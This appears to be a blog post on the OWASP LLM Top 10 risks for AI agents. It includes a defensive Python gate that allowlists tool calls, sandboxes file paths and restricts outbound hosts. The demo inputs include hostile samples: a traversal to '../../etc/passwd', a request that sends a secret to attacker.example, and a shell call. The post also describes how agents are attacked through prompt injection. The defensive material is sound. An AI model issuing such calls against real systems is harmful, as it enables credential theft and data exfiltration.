insidejob

OWASP LLM Top 10: the evolving AI security landscape

As AI agents gain autonomy — executing code, browsing the web, and managing infrastructure — the attack surface expands dramatically. The OWASP LLM Top 10 project tracks the most critical security risks.

Key risks for agentic AI

  • Prompt injection — direct and indirect; it remains the top concern as agents process untrusted content
  • Excessive agency — agents granted broad tool access without proper guardrails
  • Supply chain vulnerabilities — compromised MCP servers, plugins, or model weights
  • Data exfiltration — agents accessing and leaking sensitive data through tool use
  • Insecure output handling — trusting model outputs without validation
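The last four items on that list share one mitigation pattern: treat everything the model emits as untrusted input, and put a policy gate between the model and the tool runtime that enforces least privilege. The following is an added example (not code from the OWASP project or from this post): a small gate that parses a model-emitted tool call, allowlists the tool name and its exact arguments, confines file paths to a sandbox root, restricts outbound URLs to an egress allowlist, and logs every decision so denials can feed detection. The tool names, argument rules, sandbox root and allowed host are all assumptions made for the illustration.

```python
import json
import logging
from pathlib import Path
from typing import Any
from urllib.parse import urlsplit

# Constructed illustration: a policy gate between an agent's model output and
# its tool runtime. Tool names, argument rules, the sandbox root and the egress
# allowlist are assumptions for this example, not an OWASP or vendor API.

log = logging.getLogger("agent.toolgate")

SANDBOX_ROOT = Path("/srv/agent-sandbox")     # hypothetical workspace root
ALLOWED_HOSTS = {"api.example.internal"}      # hypothetical egress allowlist

# Least privilege: the model may only call these tools, with exactly these args.
TOOL_POLICY: dict[str, dict[str, set[str]]] = {
    "read_file": {"required": {"path"}, "allowed": {"path"}},
    "http_get":  {"required": {"url"},  "allowed": {"url"}},
}


class PolicyViolation(Exception):
    """Raised when a model-emitted tool call fails validation."""


def _check_path(raw: Any) -> str:
    """Confine file access to SANDBOX_ROOT; rejects traversal and absolute paths."""
    if not isinstance(raw, str) or not raw:
        raise PolicyViolation("path must be a non-empty string")
    root = SANDBOX_ROOT.resolve()
    candidate = (root / raw).resolve()  # "/etc/x" and "../x" both leave the root
    if not candidate.is_relative_to(root):
        raise PolicyViolation(f"path escapes sandbox: {raw!r}")
    return str(candidate)


def _check_url(raw: Any) -> str:
    """Allow only HTTPS to allowlisted hosts, limiting exfiltration via tool use."""
    if not isinstance(raw, str):
        raise PolicyViolation("url must be a string")
    parts = urlsplit(raw)
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
        raise PolicyViolation(f"egress not permitted: {raw!r}")
    return raw


ARG_VALIDATORS = {"path": _check_path, "url": _check_url}


def validate_tool_call(model_output: str) -> dict[str, Any]:
    """Parse the model's output as a tool call and enforce TOOL_POLICY.

    The output is parsed, never executed, and every field is checked before
    anything reaches a tool (the insecure-output-handling risk).
    """
    try:
        call = json.loads(model_output)
    except json.JSONDecodeError as exc:
        raise PolicyViolation(f"tool call is not valid JSON: {exc.msg}") from None
    if not isinstance(call, dict):
        raise PolicyViolation("tool call must be a JSON object")

    name = call.get("tool")
    args = call.get("args", {})
    if name not in TOOL_POLICY:
        raise PolicyViolation(f"tool not in allowlist: {name!r}")
    if not isinstance(args, dict):
        raise PolicyViolation("args must be a JSON object")

    policy = TOOL_POLICY[name]
    missing = policy["required"] - args.keys()
    extra = args.keys() - policy["allowed"]
    if missing or extra:
        raise PolicyViolation(
            f"bad args for {name}: missing={sorted(missing)} extra={sorted(extra)}"
        )

    # Each argument passes through its own validator; no value is used raw.
    clean_args = {k: ARG_VALIDATORS[k](v) for k, v in args.items()}
    return {"tool": name, "args": clean_args}


def gate(model_output: str) -> tuple[bool, str]:
    """Decide on a tool call and write an audit record for every decision.

    Returns (allowed, detail): the denial reason, or the tool name on approval.
    A burst of denials from one agent session is a useful detection signal.
    """
    try:
        call = validate_tool_call(model_output)
    except PolicyViolation as exc:
        log.warning("DENIED tool call %r: %s", model_output[:200], exc)
        return False, str(exc)
    log.info("ALLOWED tool call %s %s", call["tool"], call["args"])
    return True, call["tool"]


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    # Constructed sample outputs: one legitimate call, then the kinds of call
    # the risk list above warns about (traversal, exfiltration, unknown tool).
    for sample in (
        '{"tool": "read_file", "args": {"path": "notes/todo.txt"}}',
        '{"tool": "read_file", "args": {"path": "../../etc/passwd"}}',
        '{"tool": "http_get", "args": {"url": "http://attacker.example/?d=secret"}}',
        '{"tool": "run_shell", "args": {"cmd": "id"}}',
    ):
        print(gate(sample))
```

The gate does not try to decide whether the model was manipulated; it only bounds what a manipulated model can do, which is the practical defence against indirect prompt injection when the content an agent reads cannot be trusted. The audit log is the other half: denied calls are cheap, high-signal events for a detection pipeline.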

What to watch

The intersection of AI agents and security is one of the fastest-moving areas in the field. Red teaming, adversarial ML research, and prompt injection defenses are all active research frontiers.